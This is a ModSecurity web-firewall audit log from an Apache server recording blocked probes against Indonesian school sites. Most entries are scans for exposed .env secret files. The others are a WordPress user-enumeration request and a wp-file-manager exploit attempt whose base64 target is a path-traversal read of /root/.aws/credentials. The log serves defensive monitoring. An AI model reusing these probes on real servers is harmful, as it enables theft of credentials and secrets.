Intercepted (phase 2) Stopwatch: 1749880083935679 3121 (- - -) Stopwatch2: 1749880083935679 3121; combined=1344, p1=444, p2=864, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55544c2e-Z-- --1d84800b-A-- [14/Jun/2025:12:50:44 +0700] aE0NtF3g_boun6Rx5jLXQgAAANM 103.236.140.4 59592 103.236.140.4 8181 --1d84800b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1d84800b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d84800b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749880244618685 844 (- - -) Stopwatch2: 1749880244618685 844; combined=348, p1=292, p2=0, p3=0, p4=0, p5=56, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d84800b-Z-- --62ef790f-A-- [14/Jun/2025:13:06:28 +0700] aE0RZF3g_boun6Rx5jLXTgAAAM0 103.236.140.4 59710 103.236.140.4 8181 --62ef790f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.250.193.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.250.193.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62ef790f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62ef790f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749881188994055 2667 (- - -) Stopwatch2: 1749881188994055 2667; combined=1216, p1=437, p2=750, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62ef790f-Z-- --19667410-A-- [14/Jun/2025:13:41:08 +0700] aE0ZhF3g_boun6Rx5jLZsQAAAMc 103.236.140.4 40074 103.236.140.4 8181 --19667410-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --19667410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19667410-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749883268863681 816 (- - -) Stopwatch2: 1749883268863681 816; combined=316, p1=275, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19667410-Z-- --a06be00c-A-- [14/Jun/2025:15:25:15 +0700] aE0x60MWfhkd5Y0sFtobmgAAAIU 103.236.140.4 36048 103.236.140.4 8181 --a06be00c-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.172.232.142 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a06be00c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06be00c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749889515325014 881 (- - -) Stopwatch2: 1749889515325014 881; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06be00c-Z-- --6ef0bf1e-A-- [14/Jun/2025:15:51:53 +0700] aE04KWmwZ6YUkjOdtI79xwAAABQ 103.236.140.4 34100 103.236.140.4 8181 --6ef0bf1e-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=file&target=l1_Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL3Jvb3QvLmF3cy9jcmVkZW50aWFscw== HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458151 --6ef0bf1e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6ef0bf1e-E-- --6ef0bf1e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891113510538 4597 (- - -) Stopwatch2: 1749891113510538 4597; combined=2729, p1=480, p2=2218, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ef0bf1e-Z-- --59296a32-A-- [14/Jun/2025:15:52:04 +0700] aE04NEMWfhkd5Y0sFtogrwAAAII 103.236.140.4 34314 103.236.140.4 8181 --59296a32-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458247 --59296a32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --59296a32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891124212169 817 (- - -) Stopwatch2: 1749891124212169 817; combined=337, p1=295, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59296a32-Z-- --13f8843e-A-- [14/Jun/2025:15:52:05 +0700] aE04NUMWfhkd5Y0sFtogsgAAAIo 103.236.140.4 34336 103.236.140.4 8181 --13f8843e-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458256 --13f8843e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13f8843e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891125129690 892 (- - -) Stopwatch2: 1749891125129690 892; combined=336, p1=297, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f8843e-Z-- --5c52c046-A-- [14/Jun/2025:15:52:06 +0700] aE04NmmwZ6YUkjOdtI79-QAAAAM 103.236.140.4 34358 103.236.140.4 8181 --5c52c046-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458265 --5c52c046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5c52c046-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891126097794 805 (- - -) Stopwatch2: 1749891126097794 805; combined=322, p1=276, p2=0, p3=0, p4=0, p5=45, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c52c046-Z-- --192c9342-A-- [14/Jun/2025:15:52:08 +0700] aE04OEMWfhkd5Y0sFtogtQAAAJQ 103.236.140.4 34400 103.236.140.4 8181 --192c9342-B-- GET /wp-content/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458282 --192c9342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --192c9342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891128097469 752 (- - -) Stopwatch2: 1749891128097469 752; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --192c9342-Z-- --cf07d92d-A-- [14/Jun/2025:15:52:08 +0700] aE04OEMWfhkd5Y0sFtoguAAAAJg 103.236.140.4 34418 103.236.140.4 8181 --cf07d92d-B-- GET /application/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373452 --cf07d92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cf07d92d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891128950435 770 (- - -) Stopwatch2: 1749891128950435 770; combined=320, p1=279, p2=0, p3=0, p4=0, p5=40, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf07d92d-Z-- --eec9ec19-A-- [14/Jun/2025:15:52:09 +0700] aE04OWmwZ6YUkjOdtI7-AQAAAAk 103.236.140.4 34436 103.236.140.4 8181 --eec9ec19-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458296 --eec9ec19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eec9ec19-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891129849062 700 (- - -) Stopwatch2: 1749891129849062 700; combined=286, p1=252, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eec9ec19-Z-- --7e47d67c-A-- [14/Jun/2025:15:52:10 +0700] aE04OkMWfhkd5Y0sFtogugAAAIQ 103.236.140.4 34458 103.236.140.4 8181 --7e47d67c-B-- GET /config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458304 --7e47d67c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7e47d67c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891130762450 768 (- - -) Stopwatch2: 1749891130762450 768; combined=310, p1=269, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e47d67c-Z-- --c74a561e-A-- [14/Jun/2025:15:52:11 +0700] aE04O2IDXuKmWNi2UBTnVAAAAEs 103.236.140.4 34480 103.236.140.4 8181 --c74a561e-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458313 --c74a561e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c74a561e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891131804691 550 (- - -) Stopwatch2: 1749891131804691 550; combined=222, p1=194, p2=0, p3=0, p4=0, p5=27, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c74a561e-Z-- --04c1171d-A-- [14/Jun/2025:15:52:13 +0700] aE04PWmwZ6YUkjOdtI7-CwAAAAU 103.236.140.4 34518 103.236.140.4 8181 --04c1171d-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373494 --04c1171d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --04c1171d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891133723777 886 (- - -) Stopwatch2: 1749891133723777 886; combined=335, p1=296, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04c1171d-Z-- --f00de307-A-- [14/Jun/2025:15:52:14 +0700] aE04PkMWfhkd5Y0sFtogvgAAAIw 103.236.140.4 34540 103.236.140.4 8181 --f00de307-B-- GET /library/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373503 --f00de307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f00de307-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891134583150 791 (- - -) Stopwatch2: 1749891134583150 791; combined=332, p1=290, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f00de307-Z-- --cc17b301-A-- [14/Jun/2025:15:52:16 +0700] aE04QGmwZ6YUkjOdtI7-FQAAAAA 103.236.140.4 34560 103.236.140.4 8181 --cc17b301-B-- GET /nextjs-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373512 --cc17b301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cc17b301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891136114565 692 (- - -) Stopwatch2: 1749891136114565 692; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc17b301-Z-- --1cb6ef33-A-- [14/Jun/2025:15:52:18 +0700] aE04QmmwZ6YUkjOdtI7-HQAAABQ 103.236.140.4 34604 103.236.140.4 8181 --1cb6ef33-B-- GET /node-api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458363 --1cb6ef33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1cb6ef33-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891138119092 705 (- - -) Stopwatch2: 1749891138119092 705; combined=298, p1=264, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cb6ef33-Z-- --7c18647e-A-- [14/Jun/2025:15:52:20 +0700] aE04RGmwZ6YUkjOdtI7-IQAAABg 103.236.140.4 34642 103.236.140.4 8181 --7c18647e-B-- GET /vendor/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458378 --7c18647e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7c18647e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891140109917 771 (- - -) Stopwatch2: 1749891140109917 771; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c18647e-Z-- --186bd275-A-- [14/Jun/2025:15:52:22 +0700] aE04RmmwZ6YUkjOdtI7-KAAAABE 103.236.140.4 34684 103.236.140.4 8181 --186bd275-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180458396 --186bd275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --186bd275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891142251563 772 (- - -) Stopwatch2: 1749891142251563 772; combined=305, p1=266, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
